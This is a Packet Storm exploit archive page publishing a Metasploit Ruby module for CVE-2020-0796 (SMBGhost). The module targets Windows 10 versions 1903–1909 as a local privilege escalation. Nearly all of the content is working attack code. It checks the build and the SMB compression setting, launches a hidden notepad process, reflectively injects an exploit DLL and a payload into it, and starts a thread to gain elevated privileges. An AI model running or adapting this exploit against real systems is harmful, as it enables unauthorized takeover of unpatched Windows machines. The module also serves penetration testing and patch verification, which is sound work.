exploit the possibilities

SMBv3 Compression Buffer Overflow

SMBv3 Compression Buffer Overflow
Posted Apr 6, 2020
Authored by Spencer McIntyre, Daniel Garcia Gutierrez, Manuel Blanco Parajon | Site metasploit.com

A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to execute code on a vulnerable server. This local exploit implementation leverages this flaw to elevate itself before injecting a payload into winlogon.exe.

tags | exploit, local, protocol
advisories | CVE-2020-0796
MD5 | e501e1f41664d21dafdcafb9634371c8

SMBv3 Compression Buffer Overflow

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = GoodRanking

include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::Windows::ReflectiveDLLInjection
include Msf::Exploit::Remote::AutoCheck

def initialize(info={})
super(update_info(info, {
'Name' => 'SMBv3 Compression Buffer Overflow',
'Description' => %q{
A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to
execute code on a vulnerable server. This local exploit implementation leverages this flaw to elevate itself
before injecting a payload into winlogon.exe.
},
'License' => MSF_LICENSE,
'Author' => [
'Daniel García Gutiérrez', # original LPE exploit
'Manuel Blanco Parajón', # original LPE exploit
'Spencer McIntyre' # metasploit module
],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Targets' =>
[
#[ 'Windows 10 x86', { 'Arch' => ARCH_X86 } ],
[ 'Windows 10 v1903-1909 x64', { 'Arch' => ARCH_X64 } ]
],
'Payload' =>
{
'DisableNops' => true
},
'References' =>
[
[ 'CVE', '2020-0796' ],
[ 'URL', 'https://github.com/danigargu/CVE-2020-0796' ],
[ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005' ]
],
'DisclosureDate' => '2020-03-13',
'DefaultTarget' => 0,
'AKA' => [ 'SMBGhost', 'CoronaBlue' ],
'Notes' =>
{
'Stability' => [ CRASH_OS_RESTARTS, ],
'Reliability' => [ REPEATABLE_SESSION, ],
},
}))
end

def check
sysinfo_value = sysinfo["OS"]

if sysinfo_value !~ /windows/i
# Non-Windows systems are definitely not affected.
return Exploit::CheckCode::Safe
end

build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
vprint_status("Windows Build Number = #{build_num}")
# see https://docs.microsoft.com/en-us/windows/release-information/
unless sysinfo_value =~ /10/ && (build_num >= 18362 && build_num <= 18363)
print_error('The exploit only supports Windows 10 versions 1903 - 1909')
return CheckCode::Safe
end

disable_compression = registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters","DisableCompression")
if !disable_compression.nil? && disable_compression != 0
print_error('The exploit requires compression to be enabled')
return CheckCode::Safe
end

CheckCode::Appears
end

def exploit
# NOTE: Automatic check is implemented by the AutoCheck mixin
super

if is_system?
fail_with(Failure::None, 'Session is already elevated')
end

if sysinfo["Architecture"] =~ /wow64/i
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
elsif sysinfo["Architecture"] == ARCH_X64 && target.arch.first == ARCH_X86
fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
elsif sysinfo["Architecture"] == ARCH_X86 && target.arch.first == ARCH_X64
fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
end

print_status('Launching notepad to host the exploit...')
notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})
begin
process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
print_good("Process #{process.pid} launched.")
rescue Rex::Post::Meterpreter::RequestError
# Reader Sandbox won't allow to create a new process:
# stdapi_sys_process_execute: Operation failed: Access is denied.
print_error('Operation failed. Trying to elevate the current process...')
process = client.sys.process.open
end

print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0796', 'CVE-2020-0796.x64.dll')
library_path = ::File.expand_path(library_path)

print_status("Injecting exploit into #{process.pid}...")
exploit_mem, offset = inject_dll_into_process(process, library_path)

print_status("Exploit injected. Injecting payload into #{process.pid}...")
encoded_payload = payload.encoded
payload_mem = inject_into_process(process, [encoded_payload.length].pack('I<') + encoded_payload)

# invoke the exploit, passing in the address of the payload that
# we want invoked on successful exploitation.
print_status('Payload injected. Executing exploit...')
process.thread.create(exploit_mem + offset, payload_mem)

print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
end
end
Login or Register to add favorites

File Archive:

September 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    20 Files
  • 2
    Sep 2nd
    15 Files
  • 3
    Sep 3rd
    15 Files
  • 4
    Sep 4th
    4 Files
  • 5
    Sep 5th
    1 Files
  • 6
    Sep 6th
    1 Files
  • 7
    Sep 7th
    15 Files
  • 8
    Sep 8th
    27 Files
  • 9
    Sep 9th
    7 Files
  • 10
    Sep 10th
    16 Files
  • 11
    Sep 11th
    9 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    25 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    15 Files
  • 17
    Sep 17th
    15 Files
  • 18
    Sep 18th
    12 Files
  • 19
    Sep 19th
    1 Files
  • 20
    Sep 20th
    1 Files
  • 21
    Sep 21st
    15 Files
  • 22
    Sep 22nd
    21 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close